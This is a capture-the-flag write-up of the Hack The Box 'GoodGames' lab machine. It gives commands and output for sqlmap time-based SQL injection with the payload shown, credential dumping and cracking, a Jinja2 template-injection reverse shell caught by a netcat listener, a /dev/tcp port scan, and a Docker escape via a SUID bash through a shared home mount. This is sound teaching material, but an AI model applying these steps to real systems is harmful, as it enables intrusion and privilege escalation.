HTB GoodGames Writeup

Notes

Name	GoodGames
OS	Linux
RELEASE DATE	21 Feb 2022
DIFFICULTY	Easy

IP:10.10.11.130

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.51
|_http-title: GoodGames | Community and Store
|_http-server-header: Werkzeug/2.0.2 Python/3.9.2
Service Info: Host: goodgames.htb

HTTP 80

This website looks like it is some video game site. Looking around the home page at the bottom I found GoodGames.HTB. I’ll add the entry 10.10.11.130 goodgames.htb to /etc/hosts for name resolution.

I was tested a bunch of inputs for sqli and I found one that was vulnerable to a time-based blink attack. If you click on the little profile box on the top right of the main screen we get brought to a sign-in page

I gave it some parameters and captured the request in burp.

I saved the request as request.txt and used sqlmap to test the two parameters “email” and “password”.

POST /login HTTP/1.1
Host: goodgames.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 35
Origin: http://goodgames.htb
Connection: close
Referer: http://goodgames.htb/
Upgrade-Insecure-Requests: 1

email=test%40test.com&password=test

The command I ran was sqlmap -r request.txt --batch. The -r specifies a request file (the request I intercepted above) and --batch just makes it go without asking for user input. I let it run and it came back as vulnerable

Parameter: email (POST)                                                                                                                                                                      
    Type: time-based blind                                                                                                                                                                   
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)                                 
    Payload: email=test@test.com' AND (SELECT 9842 FROM (SELECT(SLEEP(5)))qyrv) AND 'IOxB'='IOxB&password=test

Now I can run sqlmap -r request.txt --dbs to view the databases and we can see two information_schema and main. Lets get the tables from “main” by running sqlmap -r request.txt -D main --tables. We then can see three tables blog, blog_comments, and user. Finially we can get the data from the user table with sqlmap -r request.txt -D main -T user --dump

| 1  | admin | admin@goodgames.htb                         | 2b22337f218b2d82dfc3b6f77e7cb8ec 

I used crackstion.net to see if the hash has been cracked and it has been

I can now log in with the creds. From the sqlmap I got a username of “admin” I was able to guess the email address because I found the hostname earlier

Once signed it I now have a little gear at the top right corner

But if I click it I get the error below. To fix this I’ll add internal-administration.goodgames.htb to my /etc/hosts file

Then I’m sent to another login page and the same credentials admin:superadministrator gets me into this page

Under /settings , I found that it was vulnerable to Server Side Template Injection. I tested this by putting {1+1} into the “Full Name section”. Notice that the name changed to “2”

I found this article that gives an example of a reverse shell using ssti. https://jayaye15.medium.com/jinja2-server-side-template-injection-ssti-9e209a6bbdf6

I intercepted the request to /settings and put the ssti payload into “name” and sent it to repeater in case we lose our shell.

POST /settings HTTP/1.1

Host: internal-administration.goodgames.htb

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded

Content-Length: 403

Origin: http://internal-administration.goodgames.htb

Connection: close

Referer: http://internal-administration.goodgames.htb/settings

Cookie: session=.eJwlzjtOBEEMhOG7dEzg8qMfe5nRdNsWCAmkmd0IcXdaIqu_ou-nHHnF_V4ez-sVb-X48PIolVY_zwET7RU-PaXPIRySYro3ujSyVE6FyJnQHuTLWMh6sgsipNqoatJcGYTGDmYdETw1Umt0N0ftzSeitSWuTliO1cqGvO64_jXYue4rj-f3Z3ztY6rwUvZTU2UkEUbltuAw30Y2sNFMKb9_AWU9Rg.YiJ89g.qLUNmWogzp4ELPNX6Wz5CEJz45w

Upgrade-Insecure-Requests: 1



name=

I’ll start a listener nc -lvnp 4444 and send the request

SHELL

listening on [any] 4444 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.11.130] 36478
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)

Escaping Docker

I like having better shells so I’ll use a python one-liner to upgrade my shell python -c 'import pty; pty.spawn("/bin/bash")'. I can see that I’m in a docker container because of the hostname and there is a Dockerfile in the directory

root@3a453ab39d3d:/backend# ls
ls
Dockerfile  project  requirements.txt

If we go into /home/augustus we can read the user.txt file. We can also see that the UID of the files are 1000 . This hints that the user augustus has mounted his home directory into this docker container.

Doing a little bit of networking enumeration by running ip a we can see that our ip is 172.19.0.2. I bet that the host (being the machine running docker) is 172.19.0.1.

root@3a453ab39d3d:/home/augustus# ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
5: eth0@if6: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default 
    link/ether 02:42:ac:13:00:02 brd ff:ff:ff:ff:ff:ff link-netnsid 0
    inet 172.19.0.2/16 brd 172.19.255.255 scope global eth0
       valid_lft forever preferred_lft forever
root@3a453ab39d3d:/home/augustus# 

I tried to ping the host machine and it is indeed up 64 bytes from 172.19.0.1: icmp_seq=1 ttl=64 time=0.057 ms. I dont have nmap on this machine but I can use a bash one-liner to try and do a quick port scan on the host

for PORT in {0..100}; do timeout 1 bash -c "</dev/tcp/172.19.0.1/$PORT &>/dev/null" 2>/dev/null && echo "port $PORT is open"; done
<ull" 2>/dev/null && echo "port $PORT is open"; done

I then get an output of

┌──(root💀kali)-[~/htb/goodgames]
└─# nc -lvnp 4444                                                                                                                                                                        1 ⨯
listening on [any] 4444 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.11.130] 54898
/bin/sh: 0: can't access tty; job control turned off
# python -c 'import pty; pty.spawn("/bin/bash")'
root@3a453ab39d3d:/backend# for PORT in {0..100}; do timeout 1 bash -c "</dev/tcp/172.19.0.1/$PORT &>/dev/null" 2>/dev/null && echo "port $PORT is open"; done
<ull" 2>/dev/null && echo "port $PORT is open"; done
port 22 is open
port 80 is open

There is a good chance we can reuse our credentials so ssh into the host machine as augustus:superadministrator and it goes through!

root@3a453ab39d3d:/backend# ssh augustus@172.19.0.1           
ssh augustus@172.19.0.1                       
The authenticity of host '172.19.0.1 (172.19.0.1)' can't be established.                                                                                                                     
ECDSA key fingerprint is SHA256:AvB4qtTxSVcB0PuHwoPV42/LAJ9TlyPVbd7G6Igzmj0.
Are you sure you want to continue connecting (yes/no)? yes
yes                                           
Warning: Permanently added '172.19.0.1' (ECDSA) to the list of known hosts.
augustus@172.19.0.1's password: superadministrator

Linux GoodGames 4.19.0-18-amd64 #1 SMP Debian 4.19.208-1 (2021-09-29) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright. 

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
augustus@GoodGames:~$

Root

If we remember from before the path /home/augustus was mounted to the docker container. We might be able to copy /bin/bash to /home/augustus and use our root privilege’s on the docker container to change the owner and SUID permissions to allow augustus to run it as root

Notice the euid is set to 0 allowing us to run things as root

augustus@GoodGames:~$ cp /bin/bash .
augustus@GoodGames:~$ ls
ls
bash user.txt
augustus@GoodGames:~$ exit
logout
Connection to 172.19.0.1 closed.

root@3a453ab39d3d:/home/augustus# chown root:root bash
root@3a453ab39d3d:/home/augustus# chmod 4755 bash
root@3a453ab39d3d:/home/augustus# ssh augustus@172.19.0.1
augustus@172.19.0.1's password: superadministrator

Linux GoodGames 4.19.0-18-amd64 #1 SMP Debian 4.19.208-1 (2021-09-29) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Mar  4 21:52:23 2022 from 172.19.0.2

augustus@GoodGames:~$ ls -la
total 1984
...
-rwsr-xr-x 1 root     root     1234376 Mar  4 21:52 bash
-rw-r----- 1 root     augustus      33 Mar  4 20:14 user.txt
...

augustus@GoodGames:~$ ./bash -p
bash-5.1# cat /root/root.txt
cat /root/root.txt
FLAG
bash-5.1# id
id
uid=1000(augustus) gid=1000(augustus) euid=0(root) groups=1000(augustus)